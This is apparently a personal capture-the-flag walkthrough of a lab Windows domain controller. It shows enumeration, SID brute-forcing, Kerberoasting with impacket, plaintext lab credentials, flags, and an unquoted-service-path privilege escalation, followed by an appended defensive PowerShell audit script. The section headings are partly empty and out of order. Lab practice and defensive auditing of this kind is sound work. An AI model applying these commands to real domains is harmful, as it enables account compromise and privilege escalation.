[[Get-Acl]]
System IP : 10.10.93.195
### Summary
**1- Overview**
**2- Enumeration**
2.1- Nmap Scan
2.2- Web Site Discovery
2.3- Active Directory Enumeration
**3- Privilege Escalation**
3.1- Post-Compromise Enumeration
3.2- New Account Enumeration
3.3- Post-Compromise Exploitation
## 1- Overview
The web interface revealed that the project had been migrated to GitHub. In the commit history of the dev branch on GitHub we found an account and password. With those credentials, impacket-GetUserSPNs dumped the bitbucket account's service ticket hash, which let us log in over RDP. Finally, the service binary sits in an unquoted path with spaces inside a directory we can write to, and the service ACL lets us restart it (checked with PowerShell's Get-Acl), which gave us SYSTEM.
## 2- Enumeration
### 2.1- Service Enumeration
**Using nmapAutomator for scanning:**
```
/mnt/nmapAutomator/nmapAutomator.sh -o ./ -t all 10.10.93.195
```
**The nmap results are as follows:**
```
PORT STATE SERVICE REASON VERSION
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: ENTERPRISE.THM0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7990/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Log in to continue - Log in with Atlassian account
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49703/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49708/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49836/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
```
### 2.2- Web Site Discovery
![[Pasted image 20220117223944.png]]
http://10.10.93.195:7990/
searchsploit atlassian JIRA
![[Pasted image 20220117224640.png]]
```
Sq00ky
```
![[Pasted image 20220117235554.png]]
nik : ToastyBoi!
![[Pasted image 20220117235809.png]]
### 2.3- Active Directory Enumeration
**Searching for LDAP information**
Let’s begin with using ldapsearch to grab general information:
```
nmap -n -sV --script "ldap* and not brute" 10.10.93.195
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='vulnnet-rst.local'" 10.10.93.195
ldapsearch -x -s base namingcontexts -h 10.10.93.195
ldapsearch -x -D '' -w '' -b "DC=ENTERPRISE,DC=THM" -h 10.10.93.195
ldapsearch -x -D 'active.htb\SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "DC=active,DC=htb" -h
```
**The results are as follows:**
```
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: CN=Configuration,DC=ENTERPRISE,DC=THM
namingcontexts: CN=Schema,CN=Configuration,DC=ENTERPRISE,DC=THM
namingcontexts: DC=ForestDnsZones,DC=ENTERPRISE,DC=THM
namingcontexts: DC=LAB,DC=ENTERPRISE,DC=THM
namingcontexts: DC=DomainDnsZones,DC=LAB,DC=ENTERPRISE,DC=THM
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
```
Domain names found:
```
ENTERPRISE.THM
LAB-ENTERPRISE
LAB-ENTERPRISE.THM
```
We can also use impacket-lookupsid to enumerate domain users:
```
impacket-lookupsid [email protected]
```
Results:
```
[*] Brute forcing SIDs at 10.10.93.195
[*] StringBinding ncacn_np:10.10.93.195[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2168718921-3906202695-65158103
500: LAB-ENTERPRISE\Administrator (SidTypeUser)
501: LAB-ENTERPRISE\Guest (SidTypeUser)
502: LAB-ENTERPRISE\krbtgt (SidTypeUser)
512: LAB-ENTERPRISE\Domain Admins (SidTypeGroup)
513: LAB-ENTERPRISE\Domain Users (SidTypeGroup)
514: LAB-ENTERPRISE\Domain Guests (SidTypeGroup)
515: LAB-ENTERPRISE\Domain Computers (SidTypeGroup)
516: LAB-ENTERPRISE\Domain Controllers (SidTypeGroup)
517: LAB-ENTERPRISE\Cert Publishers (SidTypeAlias)
520: LAB-ENTERPRISE\Group Policy Creator Owners (SidTypeGroup)
521: LAB-ENTERPRISE\Read-only Domain Controllers (SidTypeGroup)
522: LAB-ENTERPRISE\Cloneable Domain Controllers (SidTypeGroup)
525: LAB-ENTERPRISE\Protected Users (SidTypeGroup)
526: LAB-ENTERPRISE\Key Admins (SidTypeGroup)
553: LAB-ENTERPRISE\RAS and IAS Servers (SidTypeAlias)
571: LAB-ENTERPRISE\Allowed RODC Password Replication Group (SidTypeAlias)
572: LAB-ENTERPRISE\Denied RODC Password Replication Group (SidTypeAlias)
1000: LAB-ENTERPRISE\atlbitbucket (SidTypeUser)
1001: LAB-ENTERPRISE\LAB-DC$ (SidTypeUser)
1102: LAB-ENTERPRISE\DnsAdmins (SidTypeAlias)
1103: LAB-ENTERPRISE\DnsUpdateProxy (SidTypeGroup)
1104: LAB-ENTERPRISE\ENTERPRISE$ (SidTypeUser)
1106: LAB-ENTERPRISE\bitbucket (SidTypeUser)
1107: LAB-ENTERPRISE\nik (SidTypeUser)
1108: LAB-ENTERPRISE\replication (SidTypeUser)
1109: LAB-ENTERPRISE\spooks (SidTypeUser)
1110: LAB-ENTERPRISE\korone (SidTypeUser)
1111: LAB-ENTERPRISE\banana (SidTypeUser)
1112: LAB-ENTERPRISE\Cake (SidTypeUser)
1113: LAB-ENTERPRISE\Password-Policy-Exemption (SidTypeGroup)
1114: LAB-ENTERPRISE\Contractor (SidTypeGroup)
1115: LAB-ENTERPRISE\sensitive-account (SidTypeGroup)
1116: LAB-ENTERPRISE\contractor-temp (SidTypeUser)
1117: LAB-ENTERPRISE\varg (SidTypeUser)
1118: LAB-ENTERPRISE\adobe-subscription (SidTypeGroup)
1119: LAB-ENTERPRISE\joiner (SidTypeUser)
```
User list:
```
atlbitbucket
bitbucket
nik
replication
spooks
korone
banana
Cake
contractor-temp
varg
joiner
```
```
impacket-GetUserSPNs lab.ENTERPRISE.THM/nik:ToastyBoi! -request -dc-ip 10.10.93.195
```
![[Pasted image 20220118001008.png]]
Cracked credentials: bitbucket : littleredbucket
![[Pasted image 20220118001543.png]]
![[Pasted image 20220118012616.png]]
The service binary runs from an unquoted path that contains spaces:
```
C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe
```
Checking the permissions on that directory shows that we can write to it:
```
Get-Acl -Path "C:\Program Files (x86)\Zero Tier\Zero Tier One\" | Format-List
```
![[Pasted image 20220118012937.png]]
Next, check the start/restart permissions on the service itself using the Get-ServiceACL.ps1 script:
```
"zerotieroneservice" | Get-ServiceAcl | select -ExpandProperty Access
```
![[Pasted image 20220118013158.png]]
![[Pasted image 20220118013217.png]]
![[Pasted image 20220118011625.png]]
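As an added example (my own defensive audit, not part of the original writeup), the following PowerShell finds the condition exploited here on any host: services whose binary path is unquoted and contains spaces, where a low-privileged principal can write to one of the directories the service control manager probes, plus a remediation that quotes the path. It assumes a local PowerShell 5.1+ session with rights to read service configuration and folder ACLs; the identity list and write mask are my assumptions, and service-restart rights (checked above with Get-ServiceAcl) are out of its scope.

```powershell
# Added audit example, not from the original writeup. Assumes PowerShell 5.1+ on the host.

# Principals that should never hold write rights on a service binary's folders (assumed list).
$LowPrivIdentities = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                       'NT AUTHORITY\INTERACTIVE')
# Standard write-type rights plus GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000).
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, CreateFiles' -bor 0x50000000

function Test-LowPrivWritable {
    # True when any Allow ACE on $Dir grants a write-type right to a low-privilege principal.
    param([string]$Dir)
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    # One record per service whose binary path is unquoted and contains a space, listing the
    # directories the SCM probes (C:\Program.exe, C:\Program Files (x86)\Zero.exe, ...)
    # that a low-privilege principal can write to.
    Get-CimInstance Win32_Service | ForEach-Object {
        $p = $_.PathName
        if (-not $p -or $p.StartsWith('"') -or $p -notmatch '(?i)\.exe') { return }
        $exe = ($p -split '(?i)\.exe', 2)[0] + '.exe'      # drop any arguments after the binary
        if ($exe -notmatch '\s') { return }
        $parts = $exe -split ' '
        $probeDirs = for ($i = 1; $i -le $parts.Count; $i++) {
            Split-Path -Parent ($parts[0..($i - 1)] -join ' ')
        }
        [pscustomobject]@{
            Service      = $_.Name
            RunsAs       = $_.StartName
            PathName     = $p
            WritableDirs = @($probeDirs | Where-Object { $_ } | Sort-Object -Unique |
                            Where-Object { Test-LowPrivWritable $_ })
        }
    }
}

function Repair-ServicePathQuoting {
    # Remediation: quote the binary so the SCM stops probing the shorter candidates.
    # Review the audit output first; this rewrites the service's ImagePath in the registry.
    param([Parameter(Mandatory)][string]$Service, [Parameter(Mandatory)][string]$PathName)
    $exe   = ($PathName -split '(?i)\.exe', 2)[0] + '.exe'
    $fixed = '"' + $exe + '"' + $PathName.Substring($exe.Length)
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$Service" -Name ImagePath -Value $fixed
    $fixed
}

# Report only services that are actually exposed (at least one writable probe directory).
Get-UnquotedServicePath | Where-Object { $_.WritableDirs.Count -gt 0 } | Format-List
```

A service such as the one above would be reported with its folder in WritableDirs; fixing the directory ACL so that only administrators and SYSTEM can write, together with quoting the path, closes both halves of the weakness.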
user.txt :THM{ed882d02b34246536ef7da79062bef36}
root.txt : THM{1a1fa94875421296331f145971ca4881}
### Hash cracking (command and screenshot) and WinRM login (command and screenshot)
## 3- Privilege Escalation
### 3.1- Post-Compromise Enumeration
Standard post-compromise information gathering such as `whoami /all`, winPEAS (peas.exe) and similar tools is useful here.
### 3.2- New Account Enumeration
### Local.txt Screenshot
### Local.txt Content
### 3.3- Post-Compromise Exploitation
### Privilege Escalation
### Proof.txt Screenshot
Get to proof.txt:
### Proof.txt Content
### Summary and overview
If you found this useful, give it a like.